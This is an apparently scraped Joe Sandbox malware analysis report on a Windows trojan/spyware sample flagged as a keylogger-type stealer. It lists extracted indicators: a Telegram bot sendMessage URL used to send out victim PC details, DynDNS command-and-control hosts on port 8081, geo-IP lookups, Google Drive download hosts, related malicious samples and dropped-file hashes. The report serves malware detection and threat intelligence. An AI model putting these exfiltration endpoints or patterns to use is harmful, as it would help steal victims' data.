                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://chrome.google.com/webstore?hl=enBivejens.exe, 00000005.00000002.2610716890.000000001E87F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://varders.kozow.com:8081Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://aborters.duckdns.org:8081Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.google.comBivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20aBivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://drive.google.com/Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://anotherarmy.dns.army:8081Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://chrome.google.com/webstore?hl=en(lmBivejens.exe, 00000005.00000002.2610716890.000000001E870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://chrome.google.com/webstore?hl=enlBBivejens.exe, 00000005.00000002.2610716890.000000001E87A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$Bivejens.exe, 00000005.00000002.2610716890.000000001E738000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.orgBivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://drive.google.com/kBivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://apis.google.comBivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://drive.usercontent.google.com/pBivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.org/xml/Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    142.250.181.238
                                                                                                    drive.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    149.154.167.220
                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                    62041TELEGRAMRUfalse
                                                                                                    104.21.80.1
                                                                                                    reallyfreegeoip.orgUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    142.250.185.65
                                                                                                    drive.usercontent.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    132.226.247.73
                                                                                                    checkip.dyndns.comUnited States
                                                                                                    16989UTMEMUSfalse
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1588340
                                                                                                    Start date and time:2025-01-11 00:39:42 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 6m 58s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:10
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:TjoY7n65om.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/13@5/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 98%
                                                                                                    • Number of executed functions: 160
                                                                                                    • Number of non-executed functions: 155
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    TimeTypeDescription
                                                                                                    18:40:46API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                    18:41:18API Interceptor121408x Sleep call for process: Bivejens.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    149.154.167.220Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                          3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        104.21.80.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.aziziyeescortg.xyz/2pcx/
                                                                                                                        qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.mzkd6gp5.top/0hqe/
                                                                                                                        6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                                                                        • clientservices.sgoogleapis.observer/api/index.php
                                                                                                                        http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                                                                        • my.cradaygo.com/smmylet
                                                                                                                        SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.dejikenkyu.cyou/pmpa/
                                                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                        • hiranetwork.com/administrator/index.php
                                                                                                                        downloader2.htaGet hashmaliciousXWormBrowse
                                                                                                                        • 2k8u3.org/wininit.exe
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        s-part-0017.t-0009.t-msedge.netOKkUGRkZV7.exeGet hashmaliciousRemcosBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        240815025266174071.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        WN9uCxgU1T.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 13.107.246.45
                                                                                                                        checkip.dyndns.comKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 193.122.130.0
                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 158.101.44.242
                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 193.122.6.168
                                                                                                                        reallyfreegeoip.orgKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.32.1
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.48.1
                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        api.telegram.orgKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        TELEGRAMRUKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        CLOUDFLARENETUSphish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                                                                                        • 172.66.0.227
                                                                                                                        https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                        • 172.66.0.227
                                                                                                                        https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351Get hashmaliciousUnknownBrowse
                                                                                                                        • 172.66.0.227
                                                                                                                        https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 104.21.32.1
                                                                                                                        Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 104.21.16.1
                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.112.1
                                                                                                                        Gz2FxKx2cM.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 104.21.36.62
                                                                                                                        UTMEMUSKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 132.226.247.73
                                                                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 132.226.8.169
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eKb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 149.154.167.220
                                                                                                                        37f463bf4616ecd445d4a1937da06e19Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        • 142.250.181.238
                                                                                                                        • 142.250.185.65
                                                                                                                        No context
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):53158
                                                                                                                        Entropy (8bit):5.062687652912555
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                        MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                        SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                        SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                        SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):825542
                                                                                                                        Entropy (8bit):7.695013315037864
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12288:wTJidkhIqHdLcMMEbtx0GA72BzYCqqykD0AarMhiNAgZY8i3oXRKQCzcdYSS:wTkQIwL81IBUCqpqrsfZV+ER/c
                                                                                                                        MD5:6A5B8C6057DFF681139FD609FFC6B21D
                                                                                                                        SHA1:B37B7A2168980B4772978A640EBF5A02F41697E6
                                                                                                                        SHA-256:FA6B246130A460AA8915DB3F56FC3735F767A5950A12D71DC3A70C400682CC41
                                                                                                                        SHA-512:0BE9C3E2E42B53AC22237F9B2A1037CA4BB46CE908DF0BDBE455EB1DAF41457B6DD85F1D80AEE36F47FA3C6D9CF9D3A9E8867928242EDF8A93AAE21AA703F989
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                        • Antivirus: Virustotal, Detection: 65%, Browse
                                                                                                                        Reputation:low
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..........................................................................................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):26
                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
